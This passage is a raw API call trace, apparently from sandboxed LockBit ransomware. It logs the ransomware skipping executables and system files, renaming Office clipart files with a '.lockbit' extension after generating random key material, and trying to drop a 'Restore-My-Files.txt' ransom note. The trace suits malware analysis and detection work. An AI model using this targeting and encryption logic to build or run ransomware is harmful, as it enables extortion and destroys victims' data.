[0138.586] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.587] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.587] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.587] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.587] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.587] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.587] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.lockbit") returned 72 [0138.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.590] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.590] malloc (_Size=0x40068) returned 0x3d70450 [0138.590] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=11540) returned 1 [0138.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.591] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.594] malloc (_Size=0xa6) returned 0x77d7a8 [0138.594] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.595] free (_Block=0x77d7a8) [0138.595] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.595] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.595] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.595] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105282.WMF", cAlternateFileName="")) returned 1 [0138.595] lstrcmpiW (lpString1=".", lpString2="J0105282.WMF") returned -1 [0138.595] lstrcmpiW (lpString1="..", lpString2="J0105282.WMF") returned -1 [0138.595] PathFindExtensionW (pszPath="J0105282.WMF") returned=".WMF" [0138.595] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.595] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.595] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.595] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.596] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.597] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.597] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105282.WMF") returned 1 [0138.598] lstrcmpiW (lpString1="ntldr", lpString2="J0105282.WMF") returned 1 [0138.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105282.WMF") returned 1 [0138.598] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105282.WMF") returned -1 [0138.598] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105282.WMF") returned -1 [0138.598] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105282.WMF") returned 1 [0138.598] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105282.WMF") returned -1 [0138.598] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.598] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned=".WMF" [0138.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.598] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.598] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.599] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.600] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.600] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.600] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.lockbit") returned 72 [0138.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.601] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.601] malloc (_Size=0x40068) returned 0x3e70008 [0138.601] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4796) returned 1 [0138.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.602] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.607] malloc (_Size=0xa6) returned 0x77d7a8 [0138.607] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.608] free (_Block=0x77d7a8) [0138.608] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.608] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.608] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105286.WMF", cAlternateFileName="")) returned 1 [0138.608] lstrcmpiW (lpString1=".", lpString2="J0105286.WMF") returned -1 [0138.609] lstrcmpiW (lpString1="..", lpString2="J0105286.WMF") returned -1 [0138.609] PathFindExtensionW (pszPath="J0105286.WMF") returned=".WMF" [0138.609] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.609] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.610] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.610] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.611] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105286.WMF") returned 1 [0138.611] lstrcmpiW (lpString1="ntldr", lpString2="J0105286.WMF") returned 1 [0138.611] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105286.WMF") returned 1 [0138.611] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105286.WMF") returned -1 [0138.611] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105286.WMF") returned -1 [0138.611] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105286.WMF") returned 1 [0138.611] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105286.WMF") returned -1 [0138.611] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.612] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned=".WMF" [0138.612] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.612] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.612] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.613] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.613] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.lockbit") returned 72 [0138.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.614] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.614] malloc (_Size=0x40068) returned 0x3df0008 [0138.614] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6568) returned 1 [0138.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.616] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.620] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.620] malloc (_Size=0xa6) returned 0x77d7a8 [0138.620] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.623] free (_Block=0x77d7a8) [0138.623] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.623] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.623] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3dd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105288.WMF", cAlternateFileName="")) returned 1 [0138.624] lstrcmpiW (lpString1=".", lpString2="J0105288.WMF") returned -1 [0138.624] lstrcmpiW (lpString1="..", lpString2="J0105288.WMF") returned -1 [0138.624] PathFindExtensionW (pszPath="J0105288.WMF") returned=".WMF" [0138.625] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 